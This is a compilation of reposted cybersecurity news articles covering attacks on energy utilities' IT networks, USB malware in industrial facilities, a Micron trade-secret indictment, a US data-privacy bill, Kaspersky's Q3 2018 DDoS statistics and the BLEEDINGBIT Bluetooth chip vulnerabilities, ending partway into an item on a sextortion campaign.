2.11.2018 securityweek

Even if OT Systems Are Not Compromised, Cyberattacks Against IT Networks of Energy Suppliers Are Common

Attacks against critical infrastructure industries such as those targeting the energy supply -- actual and potential -- are rarely out of the news. Russia and Russian state actors are the probable aggressors. But we are still in the Cold War era of attacks against energy utilities. There has been no cyber related-successful attack against the supply of energy in the United States.

However, while attention is focused on the security of the power plant, threat hunting firm Vectra believes we are concentrating our security efforts in the wrong place.

"When I talk to the industry," Vectra's head of security analytics Chris Morales told SecurityWeek, "I am always asked, 'how can you watch my power pump?' My reply is simple: 'You've got a bigger problem than just your pumps. You have employees using Windows boxes. You use Windows servers. And your ICS systems are not as air-gapped as you like to think they are'."

We seem to be in the reconnaissance phase of a potential cyber war -- not yet an actual cyber war. Aggressors -- and all fingers tend to point primarily at Russia -- are breaking into energy utility firms and stealing plans. The purpose is to be stealthy. There is no current attempt to be disruptive.

"It really is very easy," said Morales, "for an attacker to get into an energy utility network, use the tools that are already there -- such as Outlook web access -- and then be able to hide within the signal of things that are already happening. The behaviors they use aren't really special, they're just using what's already there. In one instance, attackers used a Fortinet VPN client to do command and control -- which is not something usually monitored by security systems. When they get onto a network, they use things like PowerShell to remain invisible. I wouldn't say they use advanced tools, although I would say they are advanced attackers."

They do a good job at covering their tracks, he continued. "That's why they weren't spotted for so long, which includes erasing evidence such as logs. They uninstalled any Fortinet clients they used. Every time they did something, they cleaned it up -- which means there was nothing to report on from a log perspective. You need to focus on the network and network behaviors in real time in order to find this stuff, because this is the only thing that attackers cannot clean up."

Vectra's Cognito platform provides continuous real time visibility into network behavior, using AI to perform continuous threat detection. It provides full visibility into cyber-attacker behaviors from cloud and data center workloads to user and IoT devices, claims the firm.

Figures from a new Vectra Spotlight report (PDF), which drew anonymized metadata from more than 4 million devices, show that while destructive attacks against the energy supply have not occurred in the U.S., attacks against the IT networks of energy suppliers are common. Total command-and-control attacker behaviors (which includes elements such as external remote access, hidden HTTP CnC tunnels, and hidden HTTPS CnC tunnels) have been detected in more than 600 host devices per 10,000 host devices. Across all industries, the figure is around 450 per 10,000 hosts.

Internal reconnaissance behaviors (such as file share enumeration, internal darknet scans and port scans) have been detected in almost 10% of energy and utilities devices, compared to just over 7.5% of devices across all industries.

Lateral movement attacker behaviors (such as automated replication, a suspicious Kerberos client, and suspicious remote execution) were detected in just over 11% of energy and utilities devices, compared to around 7% for all industries.

Data exfiltration behaviors (such as a data smuggler, or a hidden DNS exfiltration tunnel) were detected in around 4.25% of devices compared to around 3.75% across all industries. The report stresses that these behaviors alone do necessarily indicate an attack unless they correlate with other behaviors in different phases of the attack lifecycle.

Nevertheless, the clear implication from these figures is that even if ICS/SCADA devices are not directly being successfully targeted, the IT networks of the energy supply industry is a major target. "The key point," said Morales, "is that a lot of these energy utilities need to pay a lot more attention to the IT side of their systems. In general, they've done a pretty good job on the ICS side and the power grid -- they're not perfect, but they've actually put a lot of time and effort there. But I don't think they've put as much time and effort into their IT networks, which is where all the precursors of an attack come from -- such as stealing all the files pertaining to ICS or SCADA."

It seems like surveillance -- but if this is genuine surveillance, then the implied intention is to be able to bridge the gap between the IT and OT networks on demand in the future. "Will the files being stolen make this any easier? Absolutely they will," said Morales. "The kind of data that attackers have taken is wiring diagrams, panel layouts, and how the turbines work. They've been in the networks and they've acquired the data that shows how the entire SCADA system works. So, the next step would be to get into those systems. When you have the blueprints, you can start to figure out how to get in and what you need to do to disrupt or damage things, such as a thermostat and the operating ranges and how to change them -- which is basically what happened with the US/Israeli attack against Iranian centrifuges with Stuxnet."

Surprisingly perhaps, there is little evidence of China being involved in this type of cyberwar precursor -- most fingers tend to point towards Russia. China seems to be avoiding activity that can be related to cyberwar. It may also be honoring the Obama accord and limiting its activity to non-industrial espionage (eg, military) -- and there is certainly a lot of evidence of Chinese activity in this area. "I feel that China is a lot more capitalist than people tend to think. They don't want to take us down -- they want us to buy their stuff," commented Morales.

The question remains, however, why is there so much cyber activity directed against the energy sector? "I absolutely believe there is weaponizing at the end of this," concluded Morales. "I can't predict it, I don't know what will happen with this; but it certainly feels like preparation in case something does happen. I personally believe that if there is ever a breakout again, between us and Russia, the first thing that opponents will want to do is take down the power systems."

Unless the energy companies improve their ability to keep stealthy adversaries out of their IT networks, the implication is that they are learning -- or, worse, have already learned -- how to do this.

USB Drives Deliver Dangerous Malware to Industrial Facilities: Honeywell
2.11.2018 securityweek

Malware Delivered via USB to Industrial Facilities Can Cause Major Disruption

Malware is still being delivered to industrial facilities via USB removable storage devices and some threats can cause significant disruptions, according to a report published on Thursday by Honeywell.

The industrial giant last year launched SMX, a product designed to protect facilities from USB-born threats, and the company has also been using it to determine the risk posed by USB drives to such organizations.

Honeywell has analyzed data collected from 50 locations across the United States, South America, Europe and the Middle East. The enterprises whose systems were part of the study represented the energy, oil and gas, chemical manufacturing, pulp and paper, and other sectors.

Honeywell said its product had blocked at least one suspicious file in 44% of the analyzed locations. Of the neutralized threats, 26% could have caused major disruptions to industrial control systems (ICS), including loss of control or loss of view.

Furthermore, Honeywell says 16% of the detected malware samples were specifically designed to target ICS or IoT systems, and 15% of the samples belonged to high profile families such as Mirai (6%), Stuxnet (2%), Triton (2%), and WannaCry (1%).

“These findings are worrisome for several reasons. That high-potency threats were at all prevalent on USB drives bound for industrial control facility use is the first concern. As ICS security experts are well aware, it only takes one instance of malware bypassing security defenses to rapidly execute a successful, widespread attack,” Honeywell said in its report. “Second, the findings also confirm that such threats do exist in the wild, as the high-potency malware was detected among day-to-day routine traffic, not pure research labs or test environments. Finally, as historical trends have shown, newly emerging threat techniques such as TRITON, which target Safety Instrumented Systems, can provoke copycat attackers.”

Learn More About Malware in Industrial Networks at SecurityWeek’s ICS Cyber Security Conference

It’s not uncommon for malware to make its way onto industrial networks and – as shown by previous studies – in a majority of cases these are non-targeted threats. Honeywell’s analysis confirms this, with only few incidents involving malware specifically targeted at industrial systems.

More than half of the threats found by Honeywell were Trojans (55%), followed by bots (11%), hacking tools (6%), and potentially unwanted applications (5%). One-third of samples had RAT functionality and 12% were capable of dropping other malware onto the compromised system. Seven percent of malicious files were hiding ransomware.

Malware delivered to ICS via USB

One noteworthy finding is that 9% of malware was designed to directly exploit flaws in the USB protocol or interface.

“Some went further, attacking the USB interface itself. 2% were associated with common Human Interface Device (HID) attacks, which trick the USB host controller into thinking there is a keyboard attached, allowing the malware to type commands and manipulate applications. This supports earlier Honeywell findings that confirmed HID attacks such as BadUSB as realistic threats to industrial operators,” Honeywell said.

Bot Fighter Shape Security Raises $26 Million
2.11.2018 securityweek

Shape Security, a provider of bot protection and anti-automation solutions, today announced that it has raised $26 million in growth capital, bringing the total raised by the Mountain View, California-based company to $132 million.

Founded by former Google, Department of Defense and major defense contractor employees, Shape’s platform helps protect against bots, fraud, and unwanted automation, and can detect and shut down automated attacks in real-time.

According to the company, its platform can “distinguish real users from fraudsters even when criminals use manual methods,” and currently processes more than 500 million transactions each day.

The additional funding will be used to support international growth, the company said.

Shape previously explained to SecurityWeek that its platform takes the advantage away from attackers by implementing real-time polymorphism, or dynamically changing code, to remove the static elements that malware, bots and other automated attacks use to interact with web applications.

“We’re making it the attacker’s problem to figure out how to be able to create a scripted programmatic attack against an application which is constantly rewriting itself,” Shuman Ghosemajumder, Shape Security’s CTO, told SecurityWeek in 2014.

"Today, we continue to use dynamic code to create a powerful defense for 20% of the consumer brands in the Fortune 500, and have evolved the original real-time polymorphism,” Sumit Agarwal, Shape Security co-founder & COO, now tells SecurityWeek.

According to Agarwal, the company has tweaked its platform in three key ways.

“We have evolved past visible changes made to application code in favor of mostly invisible changes made to our own code, which provides more stability," he said. "We have developed extremely powerful code-generation and obfuscation technologies which allow us to deliver unique code on every single pageview, for every single customer transaction we protect. This means that, even if an attacker were to reverse-engineer our code on one of our customer's websites, those learnings would be irrelevant almost immediately.”

Finally, Agarwal explained, the company has “created a self-protecting virtual machine that runs dynamically compiled JavaScript which has proven to be extremely effective at holding attackers at bay."

Norwest Venture Partners led the latest funding round, with new strategic investors JetBlue Technology Ventures and Singtel Innov8. Existing investors Kleiner Perkins, Venrock, Baseline Ventures, Allegis Capital, Focus Ventures, Epic Ventures, Raging Capital, and Tomorrow Ventures also participated.

U.S. Intel Budget Soars Under Trump
2.11.2018 securityweek

US spending on intelligence has soared under President Donald Trump, figures released on Tuesday showed, as the government stepped up cyber warfare activities and boosted spying on North Korea, China and Russia.

Spending on civilian and military intelligence jumped by 11.6 percent to $81.5 billion in fiscal 2018, which ended on September 30, according to the Department of Defense and the Office of the Director of National Intelligence.

Spending for the National Intelligence Program, which spans some 16 agencies including the Central Intelligence Agency, National Security Agency, some defense operations and reconnaissance from space, rose to $59.4 billion from $54.6 billion in fiscal 2017.

The Military Intelligence Budget came in at $22.1 billion, up from $18.4 billion in fiscal 2017.

The Trump administration has sharply increased both military and intelligence outlays, spending more on personnel, equipment and operations.

Under Trump, the CIA has resumed paramilitary actions like drone strikes in conflict zones, and also expanded investments into human intelligence.

There has also been a focused expansion of investment into offensive cyber capabilities, with the aim of blunting hacking attacks by China, Russia, North Korea and Iran.

But besides revealing the gross figure for expenditures, neither the Pentagon nor the Office of the Director of National Intelligence would provide any details on where the money goes, saying "such disclosures could harm national security."

US Accuses China, Taiwan Firms With Stealing Secrets From Chip Giant Micron
2.11.2018 securityweek

US Attorney General Jeff Sessions announced charges Thursday against Chinese and Taiwan companies for theft of an estimate $8.75 billion worth of trade secrets from US semiconductor giant Micron.

Sessions said the case was the latest in a series that are part of a state-backed program by Beijing to steal US industrial and commercial secrets.

"Taken together, these cases and many others like them paint a grim picture of a country bent on stealing its way up the ladder of economic development and doing so at American expense," Session said.

"This behavior is illegal. It is wrong. It is a threat to our national security. And it must stop."

The indictment released in the US district court in San Jose, California alleges that Chinese state-owned Fujian Jinhua Integrated Circuit Co. and privately owned United Microelectronics Corporation of Taiwan, along with three UMC executives, conspired to steal Micron trade secrets to help UMC and Fujian Jinhua develop DRAM chips used in many computer processors.

It said the three Taiwanese men -- Stephen Chen Zhengkun, He Jianting and Kenny Wang Yungming -- all previously worked at Micron and stole its technology when they joined UMC with the express purpose of transferring it to Fujian Jinhua, a two-year-old firm.

Chen was originally a top executive at Micron, then moved to lead UMC, and subsequently became president of Fujian Jinhua.

The move posed a major threat to Micron, a company valued at around $100 billion and which controls 20-25 percent of the global market for DRAM, or dynamic random-access memory, chips.

The indictment came four months after Fujian Jinhua won a patent dispute with Micron in a Chinese court, gaining an order for the US company to stop sales in China of more than a dozen solid-state drives, memory sticks and chips.

In retaliation, the US Commerce Department on Monday placed heavy restrictions on Fujian Jinhua's ability to buy US machinery and materials for its factories that would boost its DRAM production capabilities.

The new restrictions mean US firms will need special approval to export products intended for use by state-owned Fujian Jinhua Integrated Circuit Company, Ltd., according to a statement.

In addition to the criminal charges announced Thursday, the Justice Department filed a civil lawsuit to block imports of any UMC and Fujian Jinhua products using stolen Micron technology.

In the past two months the Justice Department has also indicted 12 Chinese, including three intelligence officials, in an alleged five-year plot to steal jet engine technology from major US and French companies who supply the world's airlines.

New Bill Proposes Prison for Execs Misusing Consumer Data
2.11.2018 securityweek

Democrat Senator Ron Wyden released a draft bill this week that proposes big fines for companies misusing the personal information of American consumers, along with significant prison terms for their executives.

The new bill, named the Consumer Data Protection Act of 2018, aims to give consumers control over their data, including how it’s sold or shared, and gives the U.S. Federal Trade Commission (FTC) the power to issue fines and other penalties.

Sen. Wyden is accepting feedback on the bill. In its current form, the legislation empowers the FTC to establish minimum privacy and security standards, issue fines of up to 4% of an offending company’s annual revenue (similar to the EU’s GDPR), and even prison terms ranging between 10 and 20 years for senior executives. The agency would be given the resources necessary to hire 175 individuals to “police” the market for private data.

The bill also proposes the implementation of a national “do not track” system that allows consumers to stop companies from tracking them on the web. On the other hand, firms would be allowed to charge individuals who want to use their products without having their personal information monetized.

Consumers would also be given the tools to review the information a company has on them and find out whom it has been shared with.

“Today’s economy is a giant vacuum for your personal information – Everything you read, everywhere you go, everything you buy and everyone you talk to is sucked up in a corporation’s database. But individual Americans know far too little about how their data is collected, how it’s used and how it’s shared,” Sen. Wyden stated.

“It’s time for some sunshine on this shadowy network of information sharing. My bill creates radical transparency for consumers, gives them new tools to control their information and backs it up with tough rules with real teeth to punish companies that abuse Americans’ most private information,” he added.

Sen. Wyden has been highly involved in matters related to cyber security. He proposed a bill to force vendors to ensure basic security in IoT devices, he asked the Department of Defense to secure its websites, and urged federal agencies to ditch Flash Player.

DDoS Attacks in Q3 2018
2.11.2018 Kaspersky

News Overview
The third quarter 2018 turned out relatively quiet in terms of DDoS attacks. “Relatively” because there were not very many high-level multi-day DDoS onslaughts on major resources. However, the capacities employed by cybercriminals keep growing year after year, while the total number of attacks shows no signs of decline.

The early July attack on Blizzard Entertainment has made some of this summer’s top headlines. Battle.net servers were sent offline, preventing players from logging in and launching their games for almost three days. The responsibility was claimed by a group called PoodleCorp, which made an appearance on Twitter promising to leave the company alone if their message were retweeted 2,000 times or more. Soon after their condition was satisfied, Blizzard reported “having fixed the technical issues earlier experienced by players.”

Towards the end of July there followed a series of attacks on another game publisher – Ubisoft. As a result, players were having trouble logging on to their accounts and using the multiplayer mode. According to the company spokesmen, user data was not compromised. There were no reports as to the purpose of the action. The attackers might have had financial gains in mind or just protested against some of the recent updates made to the games.

One more attack deserving the epithet of ‘major’ was, for several days, plaguing the three largest poker websites in the English-speaking segment: America’s Card… Room, PokerStars and Partypoker. The victimized operators were forced to cancel some of their events, sparking resentment on the part of players, who thus lost major sums of money.

As always, there were also DDoS attacks almost certainly resulting from political tension. The six-minute long disruption of the Swedish Social Democratic Party’s website at the end of August has been a stark example of such an attack. Likewise, politics is believed to have driven a similar attack on the website of a Democratic congressional candidate in California, which followed a month later. The tag of ‘political’ is also likely deserved by the activism-inspired (or rather environmental) motives which had fuelled the attack on the German RWE: by hitting their website the activists were trying to draw public attention to the impending clearing of the Hambach forest.

One way or another, the general public is still at a loss as to what had caused the affliction of the Ministry of Labor of the Republic of South Africa (the attack on its web resource took place in early September and, according to the Ministry spokesman, no internal systems or data were compromised). There is equal uncertainty as to the motives behind the attacks on the governmental service DigiD in Netherlands: at the end of July it was attacked thrice within one week, leaving many citizens unable to access its taxation-related and other features. Again, no data leaks were reported.

There are not many updates to the DDoS attackers’ toolset; although some curious new techniques and a couple of fresh vulnerabilities did get within sight of the experts. Thus, on July 20, they detected a mass “recruiting campaign” targeting D-Link routers, which used over 3,000 IPs and just one command server. The exploit was not very successful in corporate environments; yet it is still to be seen whether it was able to create a new botnet of user routers (and how big at that).

Speaking of “ready” or almost ready Trojans, reports began to circulate at the end of July about the newly devised Trojan Death, which builds its botnet by recruiting surveillance cameras. The handiwork of the notorious hacker Elit1Lands, this malware uses the AVTech vulnerability, made public back in October 2016. Security researcher Ankit Anubhav has managed to contact the cybercriminal and learn that so far the botnet has not been used for mass DDoS attacks; yet the author has great expectations about it, especially as Death turned out equally suitable for spam mailouts and spying.

In addition, in late August and early September, the security specialists first saw the new versions of Mirai and Gafgyt botnets exploiting the vulnerabilities in SonicWall and Apache Struts (in the last case, the same bug associated with the massive data breach at the credit reference bureau Equifax).

Meanwhile, the three authors of the original version of Mirai, who had made it publically available, finally got their court sentence. An Alaskan federal court ordered Paras Jha, Josiah White and Dalton Norman to pay considerable restitutions and serve 2,500 hours of community service. In all appearance, they will work on behalf of FBI, and the actual mildness of the sentence was due to the fact that during the process the three subjects had duly collaborated with the federal investigators: according to court documents, the three men have already accumulated more than 1,000 hours of community service by lending their expertise to at least a dozen investigations.

In addition, the British police arrested one of the intruders behind the DDoS attack on ProtonMail, mentioned in our last report. The 19-year-old rookie hacker turned out a British citizen, also involved in making hoax bomb threats to schools, colleges and airlines. His parents insist that he was “groomed” by “serious people” online through playing the game Minecraft. This story will hardly end with the young prodigy’s employment, although he does face possible extradition to the US: according to the investigation, his exposure was mainly due to the fact that he did not practice very good operational security.

Quarter Trends
Compared to Q3 of last year, the number of DDoS attacks slightly increased due to September, while in the summer and throughout the year, there was a noticeable drop in the number of DDoS attacks.

Quarterly number of DDoS- attacks defeated by Kaspersky DDoS Protection in 2017–2018 (100% is the number of attacks in 2017) (download)

The graph above shows that the slight increase from last year is owed to September, which accounts for the lion’s share of all attacks (about 5 times more compared to 2017). July and August, quite the opposite, turned out quieter versus last year. In 2017, no such disproportion was observed.

DDoS attacks defeated by Kaspersky DDoS Protection in September in proportion to Q3 total in 2017 and 2018 (download)

DDoS upsurge exactly in September is a fairly common thing: the primary target, year after year, is the education system, attacks being directed at the web resources of schools, universities and testing centers. The attack on one of England’s leading schools – Edinburgh University, which began on September 12 and lasted for nearly 24 hours, made the biggest headlines this year.

The onsets of this sort are often blamed on enemies of state, but these allegations are unfounded, according to statistics. Thus, in the course of our private investigations we discovered that attacks mostly occur during term time and subside during vacations. The British non-profit organization Jisc got almost the same result: by collecting statistics about attacks on universities it learned that there were fewer attacks when students were on vacation. The same is true for daily out-of-class hours: the main DDoS disturbances are experienced by schools during the period from 9:00 AM to 4:00 PM.

This, of course, may suggest that the perpetrators simply synchronize their actions with the daily pulse of the universities… But the simpler the explanation, the more likely it is: in all probability these attacks, too, are devised by the young ones, who may have quite a few “good” reasons to annoy their teachers, other students, or schools in general. Consistent with this assumption, our experts were able to find traces of DDoS attack preparations in the social networks; while our colleagues from Great Britain have come across a rather amusing case of their own: an attack targeting dorm servers was launched by a student in an attempt to defeat his online game adversary.

In all appearance, these cyclical outbursts will recur in the future – either until all educational institutions have secured themselves with impenetrable defenses, or until all students and their teachers have developed a whole new awareness of DDoS attacks and their consequences. It should be mentioned, however, that while most attacks are being organized by students, it does not mean that there aren’t any “serious” ones.

For example, launched in September, the DDoS campaign against the American vendor Infinite Campus, which provides the parent portal service for many school in its district, was so powerful and protracted as to come into notice of the US Homeland Security. It can hardly be explained by schoolchildren’s efforts alone.

Anyway, while the reasons behind the September upturn are most likely connected with the coming of the new school year, it is a bit tougher to explain the downturn. Our experts believe that most botnet owners have reconfigured their capacities towards a more profitable and relatively safer source of revenue: cryptocurrency mining.

DDoS attacks have gone a lot cheaper of late, but only for the customers. As to the organizers, their costs still run high. At the very least, one has to purchase the processing power (sometimes even to equip a data center), write a Trojan of one’s own or modify an existing one (such as the ever popular Mirai), use the Trojan to assemble a botnet, find a customer, launch the attack, etc. Not to mention that these things are illegal. And the law enforcement is up to every move: the downing of Webstresser.org followed by a chain of arrests is a case in point.

On the other hand, cryptocurrency mining is almost legal these days: the only illegal aspect is the use of someone else’s hardware. Mining, with certain arrangements in place, being too light on the donor system to become apparent to its owner, there is not much of a chance of having to deal with cyberpolice. A cybercriminal can also repurpose the hardware they already own for mining thus escaping the attention of law enforcement altogether. For example, there were recent reports of a new botnet of MikroTik routers, originally created as a cryptocurrency mining tool. There is also indirect evidence that owners of many botnets with deservedly unsavory reputation have now reconfigured them to mining. Thus, the DDoS activities of the successful botnet yoyo have dropped very low, although there was no information about it having been dismantled.

There is a formula in logic which reads: correlation does not imply causation. In other words, if two variables change in a similar way, such changes do not necessarily have anything in common. Therefore, while it appears logical to link the growth in cryptocurrency mining with the slack in DDoS attacks in this year, this cannot claim to be the ultimate truth. Rather a working assumption.

Kaspersky Lab has a long history of combatting cyberthreats, including DDoS attacks of various types and complexities. The company’s experts monitor botnets using Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes the commands the bots receive from their management and control servers. To initiate protection it is not necessary to wait until a user device gets infected or until the attackers’ commands get executed.

This report contains DDoS Intelligence statistics for Q3 2018.

For the purpose of this report, a separate (one) DDoS attack is that during which the intervals between the botnet’s busy periods do not exceed 24 hours. For example, if the same resource was attacked by the same botnet a second time after a pause of 24 hours or more, two attacks are recorded. Attacks are also considered to be separate if the same resource is queried by bots belonging to different botnets.

The geographic locations of victims of DDoS attacks and command servers are registered based on their IPs. The report counts the number of unique DDoS targets by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics is limited to botnets detected and analyzed by Kaspersky Lab to date. It should also be remembered that botnets are but one of the tools used for DDoS attacks, and this section does not cover every single DDoS attack over the given period.

Quarter summary
As before, China tops the list for the highest number of attacks (78%), the US has reclaimed its second position (12.57%), Australia comes in third (2.27%) – higher than ever before. For the first time, South Korea has left the top 10 list, even though the entry threshold got much lower.
Similar trends are observed in distribution of unique targets: South Korea has dropped to the very bottom of the rating list; Australia has climbed to the third position.
In terms of number, DDoS attacks effected using botnets had their main peaks in August; the quietest day was observed in early July.
The number of sustained attacks has declined; however, short ones with duration of under 4 hours grew 17.5 p.p. (to 86.94%). The number of unique targets has increased by 63%.
The share of Linux botnets has grown only slightly from the last quarter. In this context, the by-type distribution of DDoS attacks has not changed much: SYN flood still comes first (83.2%).
The list of countries hosting the greatest number of command servers has changed a great deal over the last quarter. Countries like Greece and Canada, previously way out of the top 10, are now high up in the list.
Attacks geography
The top line is still occupied by China, its share having soared from 59.03% to 77.67%. The US reclaimed its second position, even though it has grown the negligible 0.11 p.p. to 12.57%. This is where the surprises begin.

First off, South Korea has tumbled out of the top 10 for the first time since monitoring began: its share shrank from 3.21% last quarter to 0.30% for a downhill ride from fourth to eleventh position. Meanwhile Australia has climbed from sixth to third place: now it accounts for 2.27% of the total number of outgoing DDoS attacks. This suggests that the growth trend for the continent, which has emerged over the past few quarters, is still there. Hong Kong descended from second to fourth position: its share plummeted from 17.13% to 1.72%.

Other than South Korea, Malaysia, too, has left the top ten; these two were replaced by Singapore (0.44%) and Russia (0.37%) – seventh and tenth places respectively. Their shares have grown but little from Q2, yet because of China’s leap the admittance threshold became somewhat less demanding. The example of France demonstrates this very well: in Q2 France was tenth with 0.43% of the total number of DDoS attacks; this quarter its share reduced to 0.39% but the country still has made it to the eighth place.

Likewise, the combined percentage of all the countries from outside the top 10 has dropped from 3.56% to 2.83%.

DDoS attacks by country, Q2 and Q3 2018 (download)

Similar processes are taking place in the unique targets rating of countries: China’s share grew 18 p.p. to 70.58%. The first five positions for the number of targets look basically the same as those for the number of attacks, but the top 10 list is a bit different: South Korea is still there, although its share shrank a great deal (down to 0.39% from 4.76%). In addition, the rating list lost Malaysia and Vietnam, replaced by Russia (0.46%, eighth place) and Germany (0.38%, tenth place).

Unique DDoS targets by country, Q2 and Q3 2018 (download)

Dynamics of the number of DDoS attacks
The beginning and end of Q3 were not abundant in attacks, yet August and early September feature a jagged graph with plenty of peaks and valleys. The biggest spikes occurred on August 7 and 20, which indirectly correlates with the dates when universities collect the applicants’ papers and announce admission score. July 2 turned out the quietest. The end of the quarter, although not very busy, was still marked with more attacks than its beginning.

Dynamics of the number of DDoS attacks in Q3 2018 (download)

The day of week distribution was fairly even this quarter. Saturday now is the most “dangerous” day of the week (15.58%), having snatched the palm from Tuesday (13.70%). Tuesday ended up second to last in terms of the number of attacks, just ahead of Wednesday, currently the quietest day of the week (12.23%).

DDoS attacks by day of week, Q2 and Q3 2018 (download)

Duration and types of DDoS attacks
The longest attack in Q3 lasted 239 hours – just short of 10 days. Just to remind you, the previous quarter’s longest one was on for almost 11 days (258 hours).

The share of mass, protracted attacks considerably declined. This is true not only for the “champions”, which lasted upward of 140 hours, but also for all the other categories down to 5 hours. The most dramatic decline occurred in the 5 to 9 hours duration category: these attacks were down to 5.49% from 14.01%.

Yet short attacks of under 4 hours grew almost 17.5 p.p. to 86.94%. At the same time, the number of targets grew 63% from the last quarter.

DDoS attacks by duration, hours, Q2 and Q3 2018 (download)

The distribution by type of attack was almost the same as the previous quarter. SYN flood has kept its first position; its share grew even more to 83.2% (from 80.2% in the second quarter and 57.3% in Q1). UDP traffic came in second; it also edged upward to settle at 11.9% (last quarter the figure was 10.6%). Other types of attacks lost a few percentage points but suffered no change in terms of relative incidence: HTTP is still third, while TCP and ICMP – fourth and fifth respectively.

DDoS attacks by type, Q2 and Q3 2018 (download)

Windows and Linux botnets have split in about the same proportion as the last quarter: Windows botnets have gone up (and Linux ones down) by 1.4 p.p. This correlates pretty well with the attack type variation dynamics.

Windows vs. Linux botnets, Q3 2018 (download)

Botnet distribution geography
There was some shakeup in the top ten list of regions with the largest number of botnet command servers. The US remained first, although its share declined from 44.75% last quarter to 37.31%. Russia climbed to the second place, having tripled its share from 2.76% to 8.96%. Greece came in third: it accounts for 8.21% of command servers – up from 0.55% and from its position way outside the top ten the previous quarter.

China, with 5.22%, is only fifth, outplayed by Canada which scored 6.72% (several times more than its own figure in Q2).

At the same time, there was a major increase in the combined share of the countries outside the top ten: up almost 5 p.p., it now stands at 16.42%.

Botnets command servers by country, Q3 2018 (download)

No major high-profile attacks were reported over the last three months. In contrast with the summer slowdown, the September’s upsurge of attacks on schools was particularly noticeable. It has become a part of the cyclic trend Kaspersky Lab has observed for many years.

Another conspicuous development is the shrinking number of protracted attacks paired with growing number of unique targets: botnet owners may be replacing large-scale offensives with small attacks (sometimes referred to in English-speaking media as “crawling” ones), often indistinguishable from the “network noise”. We have seen preludes to such change of paradigm over the previous quarters.

The top ten lineup in terms of the number of C&C botnets is being abruptly reshuffled for the second quarter in a row. It may be that the attackers try to expand into new territories or attempt to arrange for geographic redundancy of their resources. The reasons for that may be both economical (electricity prices, business robustness when exposed to unforeseen circumstances) and legal – anti-cybercrime action.

The statistics for the last two quarters has led us to believe that certain transformation processes are currently unfolding in the DDoS community, which may seriously reconfigure this field of cybercriminal activities in the near future.

BLEEDINGBIT Bluetooth flaws in TI chips expose enterprises to remote attacks
2.11.2019 securityaffairs

Two vulnerabilities in new Bluetooth chip, dubbed BLEEDINGBIT expose millions of access points and other networking devices to remote attacks.
Security experts from the IoT security firm Armis, the same that found the BlueBorne Bluetooth flaws, have discovered two serious vulnerabilities in BLE chips designed by Texas Instruments. The flaws, dubbed BLEEDINGBIT by Armis, could be exploited by a remote and unauthenticated attacker to take complete control of vulnerable devices and gain access to the enterprise networks housing them.

The issues affect Bluetooth Low Energy (Bluetooth 4.0) chips that are designed for applications that do not require exchanging large amounts of data, such as smart objects in healthcare and sports.

BLE is used for low power consumption devices, it is able to cover distances of Bluetooth (330 feet), but with a lower data transfer rate.

The affected chips are also used in access points and other networking devices manufactured by Cisco and Aruba Networks.

“Armis has identified two chip-level vulnerabilities impacting access points and potentially other unmanaged devices. Dubbed “BLEEDINGBIT,” they are two critical vulnerabilities related to the use of BLE (Bluetooth Low Energy) chips made by Texas Instruments (TI).” reads the post published by Armis.

“The chips are embedded in, among other devices, certain access points that deliver Wi-Fi to enterprise networks manufactured by Cisco, Meraki and Aruba. These are the leaders in networking, and accounting for nearly 70% of the market.”

At the time it is not clear the exact number of affected devices, it has been estimated that Cisco and Aruba Networks provide 70% of the wireless access points sold to enterprises every year.

The BLEEDINGBIT vulnerabilities affect several Texas Instruments chips, the CVE-2018-16986 flaw affects CC2640 and CC2650 chips running BLE-STACK 2.2.1 and earlier, and CC2640R2 running version 1.0 or earlier.

The flaw affects in several Cisco Aironet and Meraki MR access points, an attacker could exploit the flaw only if the device is actively scanning.

An attacker in range of the targeted device can trigger the flaw for remote code execution. If BLE is enabled and the device is actively scanning, an attacker can send specially crafted packets in order to trigger a memory overflow and execute arbitrary code.

“The security vulnerability for CVE-2018-16986 is present in these TI chips when scanning is used (e.g. observer role or central role that performs scanning)” continues the post.

An attack could trigger the flaw to install a backdoor on the chip and then gain full control of the vulnerable devices. Experts warn that compromising access points, the attacker can spread to other devices on the network.


The second flaw, tracked CVE-2018-7080 , affects CC2642R2, CC2640R2, CC2640, CC2650, CC2540 and CC2541 chips. The flaw can only be exploited if the device using the chip has the over-the-air firmware download (OAD) feature enabled.

“The vulnerability for CVE-2018-7080 affects any of the following TI’s BLE chips provided the vendor choose to include the OAD feature in his device.” continues the post.

The second flaw could be exploited to deliver a malicious update to the targeted AP and overwrite the operating system.

Experts pointed out that all Aruba access points share the same OAD password, which can be obtained by intercepting a legitimate update or by reverse engineering the device. According to Aruba, the flaw could be triggered only if BLE radio has been turned on.

“A vulnerability exists in the firmware of embedded BLE radios that are part of some Aruba access points. An attacker who is able to exploit the vulnerability could install new, potentially malicious firmware into the AP’s BLE radio and could then gain access to the AP’s console port.” reads the advisory published by Aruba.

Armis notified all affected vendors about the flaws, Texas Instruments released the BLE-STACK version 2.2.2 to address the CVE-2018-16986 flaw. Both Cisco and Aruba have also released security patches for affected products.

“Vulnerabilities which allow attackers to spread over the air between devices pose a tremendous threat to any organization or individual. Current security measures, including endpoint protection, mobile data management, firewalls, and network security solution are not designed to identify these type of attacks, and related vulnerabilities and exploits, as their main focus is to block attacks that can spread via IP connections.” concludes Armis.

“New solutions are needed to address the new airborne attack vector, especially those that make air gapping and network segmentation irrelevant. Additionally, there will need to be more attention and research as new protocols are using for consumers and businesses alike. With the large number of desktop, mobile, and IoT devices only increasing, it is critical we can ensure these types of vulnerabilities are not exploited. This is the primary mission of Armis in this new connected device age.”

‘Aaron Smith’ Sextortion scam campaigns hit tens of thousands of individuals
2.11.2019 securityaffairs

Security experts from Cisco Talos have uncovered two recent sextortion scam campaigns that appear to leverage on the Necurs botnet infrastructure.
Experts from Cisco Talos analyzed the two campaigns, one of them began on August 30, the other on October 5, the researchers named them ‘Aaron Smith’ sextortion scams after the ‘From: header’ of the messages.

Attackers use data from numerous data breach to carry out their campaigns, it October researchers from the Cybaze ZLab spotted a scam campaign that was targeting some of its Italian customers, crooks leverage credentials in Breach Compilation archive.

Crooks use email addresses and cracked passwords obtained through phishing attacks and data breaches to send out scam emails to potential victims pretending to be in possession of videos showing them while watching explicit videos.

The scammer demands a payment in cryptocurrency for not sharing the video.


Cisco Talos experts reported that the Aaron Smith campaigns sent out a total of 233,236 sextortion emails from 137,606 unique IP addresses.

